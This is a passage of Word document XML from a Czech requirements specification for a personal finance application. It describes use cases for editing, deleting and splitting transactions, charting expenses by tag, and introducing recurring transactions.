        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA5B9F" w:rsidRPr="008F1CD3" w:rsidRDefault="00AA5B9F" w:rsidP="00AA5B9F">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Aktéři</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA5B9F" w:rsidRDefault="00AA5B9F" w:rsidP="00AA5B9F">
      <w:r>
        <w:t>Zaregistrovaný uživatel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA5B9F" w:rsidRDefault="00AA5B9F" w:rsidP="00AA5B9F">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Podmínky pro spuštění</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA5B9F" w:rsidRPr="00173253" w:rsidRDefault="00AA5B9F" w:rsidP="00AA5B9F">
      <w:r>
        <w:t>Uživatel je přihlášen do systému.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA5B9F" w:rsidRDefault="00AA5B9F" w:rsidP="00AA5B9F">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Základní tok</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA5B9F" w:rsidRDefault="00AA5B9F" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Uživatel v</w:t>
      </w:r>
      <w:r w:rsidR="00381787">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">seznamu </w:t>
      </w:r>
      <w:r w:rsidR="00A5210C">
        <w:t>transakcí</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> vybere </w:t>
      </w:r>
      <w:r w:rsidR="00A5210C">
        <w:t>transakci</w:t>
      </w:r>
      <w:r>
        <w:t>, kter</w:t>
      </w:r>
      <w:r w:rsidR="00A5210C">
        <w:t>ou</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00710DAF">
        <w:t xml:space="preserve">si přeje </w:t>
      </w:r>
      <w:r>
        <w:t>upravit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED73C3" w:rsidRDefault="00AA5B9F" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Systém vygeneruje formulář</w:t>
      </w:r>
      <w:r w:rsidR="00DF17A1">
        <w:t xml:space="preserve"> umožňující</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> změnit </w:t>
      </w:r>
      <w:r w:rsidR="00A5210C">
        <w:t xml:space="preserve">nominální </w:t>
      </w:r>
      <w:r w:rsidR="00F00E35">
        <w:t>hodnotu</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00ED73C3">
        <w:t xml:space="preserve"> datum uskutečnění transakce, její popis a označení transakce štítky.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA5B9F" w:rsidRDefault="00AA5B9F" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Uživatel provede požadované změny a odešle formulář.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA5B9F" w:rsidRDefault="00AA5B9F" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Systém uloží změny.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA5B9F" w:rsidRDefault="00AA5B9F" w:rsidP="00AA5B9F">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Podmínky po dokončení</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA5B9F" w:rsidRPr="00EA15C6" w:rsidRDefault="00AA5B9F" w:rsidP="00AA5B9F">
      <w:r>
        <w:t>V</w:t>
      </w:r>
      <w:r w:rsidR="00381787">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t>systému jsou uložené změny provedené uživatelem.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004954AE" w:rsidRDefault="004954AE">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA5B9F" w:rsidRDefault="00381787" w:rsidP="00381787">
      <w:pPr>
        <w:pStyle w:val="Nadpis4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">UC18: </w:t>
      </w:r>
      <w:r w:rsidR="00AA5B9F">
        <w:t xml:space="preserve">Odstranění </w:t>
      </w:r>
      <w:r w:rsidR="00ED73C3">
        <w:t>transakce</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA5B9F" w:rsidRPr="002F5FD7" w:rsidRDefault="00AA5B9F" w:rsidP="00AA5B9F">
      <w:r>
        <w:t xml:space="preserve">UC umožňuje uživateli odstranit existující </w:t>
      </w:r>
      <w:r w:rsidR="00ED73C3">
        <w:t>transakci</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ze systému.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA5B9F" w:rsidRPr="008F1CD3" w:rsidRDefault="00AA5B9F" w:rsidP="00AA5B9F">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Aktéři</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA5B9F" w:rsidRDefault="00AA5B9F" w:rsidP="00AA5B9F">
      <w:r>
        <w:t>Zaregistrovaný uživatel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA5B9F" w:rsidRDefault="00AA5B9F" w:rsidP="00AA5B9F">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Podmínky pro spuštění</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA5B9F" w:rsidRPr="00173253" w:rsidRDefault="00AA5B9F" w:rsidP="00AA5B9F">
      <w:r>
        <w:t>Uživatel je přihlášen do systému.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA5B9F" w:rsidRDefault="00AA5B9F" w:rsidP="00AA5B9F">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Základní tok</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA5B9F" w:rsidRDefault="00AA5B9F" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Uživatel v</w:t>
      </w:r>
      <w:r w:rsidR="00381787">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">seznamu </w:t>
      </w:r>
      <w:r w:rsidR="00ED73C3">
        <w:t>transakcí</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> vybere </w:t>
      </w:r>
      <w:r w:rsidR="00ED73C3">
        <w:t>transakci</w:t>
      </w:r>
      <w:r>
        <w:t>, kter</w:t>
      </w:r>
      <w:r w:rsidR="00ED73C3">
        <w:t>ou</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00710DAF">
        <w:t xml:space="preserve">si přeje </w:t>
      </w:r>
      <w:r>
        <w:t>odstranit a zvolí u n</w:t>
      </w:r>
      <w:r w:rsidR="00ED73C3">
        <w:t>í</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> možnost odstranit </w:t>
      </w:r>
      <w:r w:rsidR="00ED73C3">
        <w:t>transakci</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA5B9F" w:rsidRDefault="00AA5B9F" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Systém uživatele informuje o nenávratnosti tohoto kroku a vyžádá si potvrzení uživatele.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA5B9F" w:rsidRDefault="00AA5B9F" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Uživatel potvrdí svůj úmysl odstranit vybran</w:t>
      </w:r>
      <w:r w:rsidR="00ED73C3">
        <w:t>ou</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00ED73C3">
        <w:t>transakci</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA5B9F" w:rsidRPr="00EA15C6" w:rsidRDefault="00AA5B9F" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Vybran</w:t>
      </w:r>
      <w:r w:rsidR="00ED73C3">
        <w:t>á</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00ED73C3">
        <w:t>transakce</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> je odstraněn</w:t>
      </w:r>
      <w:r w:rsidR="00ED73C3">
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ze systému.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA5B9F" w:rsidRDefault="00AA5B9F" w:rsidP="00AA5B9F">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Alternativní tok 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA5B9F" w:rsidRPr="009A0BD8" w:rsidRDefault="00AA5B9F" w:rsidP="00AA5B9F">
      <w:r>
        <w:t>3.1</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Pokud uživatel nepotvrdí svůj úmysl odstranit vybran</w:t>
      </w:r>
      <w:r w:rsidR="00ED73C3">
        <w:t>ou</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00ED73C3">
        <w:t>transakci</w:t>
      </w:r>
      <w:r>
        <w:t>, tak UC končí.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA5B9F" w:rsidRDefault="00AA5B9F" w:rsidP="00AA5B9F">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Podmínky po dokončení</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA5B9F" w:rsidRPr="00AA5B9F" w:rsidRDefault="00ED73C3" w:rsidP="00AA5B9F">
      <w:r>
        <w:t>Transakce</w:t>
      </w:r>
      <w:r w:rsidR="00AA5B9F">
        <w:t xml:space="preserve"> je odstraněn</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00AA5B9F">
        <w:t xml:space="preserve"> ze systému.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004954AE" w:rsidRDefault="004954AE">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E6D75" w:rsidRDefault="00381787" w:rsidP="00381787">
      <w:pPr>
        <w:pStyle w:val="Nadpis4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">UC19: </w:t>
      </w:r>
      <w:r w:rsidR="003E6D75">
        <w:t xml:space="preserve">Rozdělení </w:t>
      </w:r>
      <w:r w:rsidR="00ED73C3">
        <w:t xml:space="preserve">existující </w:t>
      </w:r>
      <w:r w:rsidR="003E6D75">
        <w:t>transakce</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED73C3" w:rsidRPr="002F5FD7" w:rsidRDefault="00ED73C3" w:rsidP="00ED73C3">
      <w:r>
        <w:t>UC umožňuje rozdělit existující transakci na více samostatných transakcí. To může být vhodné například v</w:t>
      </w:r>
      <w:r w:rsidR="00C06F82">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t>případě, kdy chce uživatel evidovat některé položky z</w:t>
      </w:r>
      <w:r w:rsidR="00C06F82">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t>jednoho nákupu zvlášť. Původní transakce vždy zůstává v</w:t>
      </w:r>
      <w:r w:rsidR="00C06F82">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t>systému</w:t>
      </w:r>
      <w:r w:rsidR="00F00E35">
        <w:t xml:space="preserve">, ale </w:t>
      </w:r>
      <w:r>
        <w:t>je snížena její nominální hodnota o</w:t>
      </w:r>
      <w:r w:rsidR="00F00E35">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t>hodnotu nově vytvořené transakce.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED73C3" w:rsidRPr="008F1CD3" w:rsidRDefault="00ED73C3" w:rsidP="00ED73C3">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Aktéři</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED73C3" w:rsidRDefault="00ED73C3" w:rsidP="00ED73C3">
      <w:r>
        <w:t>Zaregistrovaný uživatel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED73C3" w:rsidRDefault="00ED73C3" w:rsidP="00ED73C3">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Podmínky pro spuštění</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED73C3" w:rsidRPr="00173253" w:rsidRDefault="00ED73C3" w:rsidP="00ED73C3">
      <w:r>
        <w:t>Uživatel je přihlášen do systému.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED73C3" w:rsidRDefault="00ED73C3" w:rsidP="00ED73C3">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Základní tok</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED73C3" w:rsidRDefault="00ED73C3" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Uživatel v</w:t>
      </w:r>
      <w:r w:rsidR="00C06F82">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t>seznamu transakcí vybere transakci</w:t>
      </w:r>
      <w:r w:rsidR="00DF17A1">
        <w:t xml:space="preserve"> (příjem nebo výdaj –</w:t>
      </w:r>
      <w:r w:rsidR="00F00E35">
        <w:t xml:space="preserve"> převod</w:t>
      </w:r>
      <w:r w:rsidR="00DF17A1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F00E35">
        <w:t>mezi účty rozdělit nelze)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, kterou </w:t>
      </w:r>
      <w:r w:rsidR="00710DAF">
        <w:t xml:space="preserve">si přeje </w:t>
      </w:r>
      <w:r>
        <w:t>rozdělit a zvolí u ní možnost rozdělit transakci.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED73C3" w:rsidRDefault="00ED73C3" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Systém vygeneruje formulář určený pro vytvoření nové transakce.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED73C3" w:rsidRDefault="00ED73C3" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Uživatel ve formuláři </w:t>
      </w:r>
      <w:r w:rsidR="00F00E35">
        <w:t xml:space="preserve">vyplní </w:t>
      </w:r>
      <w:r w:rsidR="004A6F63">
        <w:t>informace o nové transakci, konkrétně nominální hodnotu, datum,</w:t>
      </w:r>
      <w:r w:rsidR="00F00E35">
        <w:t xml:space="preserve"> volitelně popis</w:t>
      </w:r>
      <w:r w:rsidR="004A6F63">
        <w:t xml:space="preserve"> a označí transakci štítky. Nakonec uživatel odešle formulář.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6F63" w:rsidRPr="00EA15C6" w:rsidRDefault="004A6F63" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Systém vytvoří novou transakci na základě odeslaných údajů. Transakce je automaticky přiřazena k</w:t>
      </w:r>
      <w:r w:rsidR="00C06F82">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t>účtu podle rozdělované transakce. Nominální hodnota rozdělované transakce je snížena o hodnotu nově vytvořené transakce.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED73C3" w:rsidRDefault="00ED73C3" w:rsidP="00ED73C3">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Podmínky po dokončení</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6F63" w:rsidRPr="004A6F63" w:rsidRDefault="004A6F63" w:rsidP="004A6F63">
      <w:r>
        <w:t>V</w:t>
      </w:r>
      <w:r w:rsidR="00C06F82">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t>systému je evidována nová transakce. Součet hodnoty nové a původní transakce je stejný jako u původní transakce před jejím rozdělením.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004954AE" w:rsidRDefault="004954AE">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00293CA5" w:rsidRDefault="00C06F82" w:rsidP="00C06F82">
      <w:pPr>
        <w:pStyle w:val="Nadpis4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">UC20: </w:t>
      </w:r>
      <w:r w:rsidR="00293CA5">
        <w:t>Zobrazení grafu podílu štítků na celkových výdajích</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00293CA5" w:rsidRPr="002F5FD7" w:rsidRDefault="00293CA5" w:rsidP="00293CA5">
      <w:r>
        <w:t xml:space="preserve">UC </w:t>
      </w:r>
      <w:r w:rsidR="003B430F">
        <w:t>umožňuje uživateli zobrazit graf podílu jednotlivých štítků na jeho celkových výdajích.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00293CA5" w:rsidRPr="008F1CD3" w:rsidRDefault="00293CA5" w:rsidP="00293CA5">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Aktéři</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00293CA5" w:rsidRDefault="00293CA5" w:rsidP="00293CA5">
      <w:r>
        <w:t>Zaregistrovaný uživatel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00293CA5" w:rsidRDefault="00293CA5" w:rsidP="00293CA5">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Podmínky pro spuštění</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00293CA5" w:rsidRPr="00173253" w:rsidRDefault="00293CA5" w:rsidP="00293CA5">
      <w:r>
        <w:t>Uživatel je přihlášen do systému.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00293CA5" w:rsidRDefault="00293CA5" w:rsidP="00293CA5">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Základní tok</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00293CA5" w:rsidRDefault="003B430F" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Uživatel zvolí možnost zobrazení grafu podílu</w:t>
      </w:r>
      <w:r w:rsidR="005A3105">
        <w:t xml:space="preserve"> štítků na jeho výdajích.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A3105" w:rsidRDefault="005A3105" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Systém vygeneruje formulář.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB039C" w:rsidRDefault="00CB039C" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Uživatel vybere časové období, zvolí účty, které chce do grafu zahrnout a formulář odešle.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB039C" w:rsidRPr="00EA15C6" w:rsidRDefault="00CB039C" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Systém vygeneruje koláčový graf podílu jednotlivých hlavních štítků a sloupcový graf podílu všech štítků na celkových výdajích za zvolené časové období na vybraných účtech.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00293CA5" w:rsidRDefault="00293CA5" w:rsidP="00293CA5">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Alternativní tok 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB039C" w:rsidRPr="00CB039C" w:rsidRDefault="00CB039C" w:rsidP="00CB039C">
      <w:r>
        <w:t>4.1</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Pokud v systému nejsou evidované žádné transakce ve zvoleném časovém období, tak grafy nejsou zobrazeny.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00293CA5" w:rsidRDefault="00293CA5" w:rsidP="00293CA5">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Podmínky po dokončení</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB039C" w:rsidRPr="00CB039C" w:rsidRDefault="00CB039C" w:rsidP="00CB039C">
      <w:r>
        <w:t>Uživateli je zobrazen</w:t>
      </w:r>
      <w:r w:rsidR="00DF17A1">
        <w:t xml:space="preserve"> koláčový</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> graf podílu jednotlivých hlavních štítků a sloupcový graf podílu všech štítků na celkových výdajích</w:t>
      </w:r>
      <w:r w:rsidR="00A8492E">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C06F82" w:rsidRDefault="00C06F82">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E6D75" w:rsidRDefault="003E6D75" w:rsidP="003E6D75">
      <w:pPr>
        <w:pStyle w:val="Nadpis3"/>
      </w:pPr>
      <w:bookmarkStart w:id="139" w:name="_Toc387327856"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Správa opakovaných transakcí</w:t>
      </w:r>
      <w:bookmarkEnd w:id="139"/>
    </w:p>
    <w:p w:rsidR="009B4AF7" w:rsidRPr="009B4AF7" w:rsidRDefault="009B4AF7" w:rsidP="009B4AF7">
      <w:r>
        <w:t xml:space="preserve">V této podkapitole jsou popsány scénáře, které se týkají správy opakovaných transakcí. </w:t>
      </w:r>
      <w:r w:rsidR="00DD7013">
        <w:t xml:space="preserve">Na základě </w:t>
      </w:r>
      <w:r w:rsidR="001C2391">
        <w:t>uložených</w:t>
      </w:r>
      <w:r w:rsidR="00DD7013">
        <w:t xml:space="preserve"> o</w:t>
      </w:r>
      <w:r w:rsidR="00981462">
        <w:t>pakovan</w:t>
      </w:r>
      <w:r w:rsidR="00DD7013">
        <w:t>ých</w:t>
      </w:r>
      <w:r w:rsidR="00981462">
        <w:t xml:space="preserve"> transakc</w:t>
      </w:r>
      <w:r w:rsidR="00DD7013">
        <w:t>í</w:t>
      </w:r>
      <w:r w:rsidR="00981462">
        <w:t xml:space="preserve"> systém </w:t>
      </w:r>
      <w:r w:rsidR="00DD7013">
        <w:t>automaticky vytváří běžné transakce</w:t>
      </w:r>
      <w:r w:rsidR="00981462">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DD7013">
        <w:t xml:space="preserve">dle </w:t>
      </w:r>
      <w:r w:rsidR="00981462">
        <w:t xml:space="preserve">zadané frekvence opakování. Opakovaná transakce je pouze šablonou pro automaticky zapisované </w:t>
      </w:r>
      <w:r w:rsidR="001C2391">
        <w:t xml:space="preserve">běžné </w:t>
      </w:r>
      <w:r w:rsidR="00981462">
        <w:t>transakce</w:t>
      </w:r>
      <w:r w:rsidR="00DD7013">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="001C2391">
        <w:t>tudíž</w:t>
      </w:r>
      <w:r w:rsidR="00DD7013">
        <w:t xml:space="preserve"> její změna nebo odstranění nemá vliv</w:t>
      </w:r>
      <w:r w:rsidR="001C2391">
        <w:t xml:space="preserve"> na</w:t>
      </w:r>
      <w:r w:rsidR="00DD7013">
        <w:t xml:space="preserve"> již </w:t>
      </w:r>
      <w:r w:rsidR="001C2391">
        <w:t xml:space="preserve">automaticky </w:t>
      </w:r>
      <w:r w:rsidR="00DD7013">
        <w:t>vytvořené běžné transakce.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B4AF7" w:rsidRDefault="00C06F82" w:rsidP="00C06F82">
      <w:pPr>
        <w:pStyle w:val="Nadpis4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="140" w:name="_Ref385937757"/>
      <w:r>
        <w:t xml:space="preserve">UC21: </w:t>
      </w:r>
      <w:r w:rsidR="009B4AF7">
        <w:t>Vytvoření nové opakované transakce</w:t>
      </w:r>
      <w:bookmarkEnd w:id="140"/>
    </w:p>
    <w:p w:rsidR="009B4AF7" w:rsidRPr="002F5FD7" w:rsidRDefault="009B4AF7" w:rsidP="009B4AF7">
      <w:r>
